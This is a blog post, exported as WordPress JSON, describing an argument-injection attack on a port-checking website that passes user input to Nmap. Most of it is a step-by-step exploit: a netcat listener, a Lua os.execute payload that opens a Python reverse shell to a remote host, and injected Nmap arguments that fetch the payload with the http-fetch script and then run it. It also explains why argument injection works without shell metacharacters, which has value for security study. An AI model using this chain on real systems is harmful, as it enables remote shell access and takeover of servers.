{"id":182,"date":"2022-08-02T17:09:22","date_gmt":"2022-08-02T11:09:22","guid":{"rendered":"https:\/\/murat.one\/?p=182"},"modified":"2022-08-02T17:16:29","modified_gmt":"2022-08-02T11:16:29","slug":"interesting-case-with-code-execution-in-nmap","status":"publish","type":"post","link":"https:\/\/murat.one\/?p=182","title":{"rendered":"Interesting case with code execution in Nmap"},"content":{"rendered":"\n<p class=\"justifier\">A very long time ago there was an interesting case involving a site for system administrators, where you could check whether a port on a host was open (the form had two inputs: IP and port).<\/p>\n\n\n\n<p class=\"justifier\">The first thing that came to mind was to enter the following in the IP field:<br><strong>127.0.0.1 -h<\/strong><br>As a result, the site returned the Nmap manual page, showing that the input was being passed straight to the Nmap command line. But many characters were filtered, and it was not possible to bypass the filters. After many attempts, an interesting remote code execution vector was found.<\/p>\n\n\n\n<p class=\"justifier\">Nmap has an NSE script named <a rel=\"noreferrer noopener\" href=\"https:\/\/nmap.org\/nsedoc\/scripts\/http-fetch.html\" target=\"_blank\">http-fetch<\/a> that can fetch URLs and download files. Moreover, you can specify where the file is saved. Reading the Nmap documentation to understand how NSE scripts work showed that NSE scripts are written in Lua and can execute commands through the os.execute() function. So now we have all the pieces of the puzzle.<\/p>\n\n\n\n<p>0) Open a listener on port 8888 on your server:<br><strong>nc -lvp 8888<\/strong><br>Let&#8217;s say your server IP is 1.1.1.1.<\/p>\n\n\n\n<p>1) Create an index.php file on your server with the following content:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>os.execute(\"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"1.1.1.1\\\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(&#91;\\\"\/bin\/sh\\\",\\\"-i\\\"]);'\")<\/code><\/pre>\n\n\n\n<p>2) Run PHP&#8217;s built-in web server:<br><strong>php -S 0.0.0.0:8080<\/strong><\/p>\n\n\n\n<p>3) On the target site, enter this in the IP field:<br><strong>1.1.1.1 -script http-fetch<\/strong><br>and this in the port field:<br><strong>8080 -dd -script-args destination=\/tmp<\/strong><br><br>On the site&#8217;s backend, something like this will run:<br><strong>nmap 1.1.1.1 -script http-fetch -p 8080 -dd -script-args destination=\/tmp<\/strong><\/p>\n\n\n\n<p class=\"justifier\">As a result of this command, the file <strong>\/tmp\/1.1.1.1\/8080\/index.html<\/strong> will contain the script from step 1.<\/p>\n\n\n\n<p class=\"justifier\">4) Run the downloaded script by entering this in the port field:<br><strong>8080 -dd -script \/tmp\/1.1.1.1\/8080\/index.html<\/strong><\/p>\n\n\n\n<p>If everything is right, you will get a connection back to your listener on 1.1.1.1:8888.<\/p>\n\n\n\n<p class=\"justifier\">Thus, sometimes it is not necessary to bypass filters or to chain a second command with characters like <strong>| &amp; ;<\/strong>: injecting arguments into the tool itself is enough.<\/p>\n\n\n\n<p>Zeroday \ud83d\ude00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>About a remote code execution vector via Nmap that was found on a site for system 
administrators.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[14],"tags":[33,18,26,17],"_links":{"self":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/182"}],"collection":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=182"}],"version-history":[{"count":3,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/182\/revisions"}],"predecessor-version":[{"id":185,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/182\/revisions\/185"}],"wp:attachment":[{"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=182"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=182"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=182"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}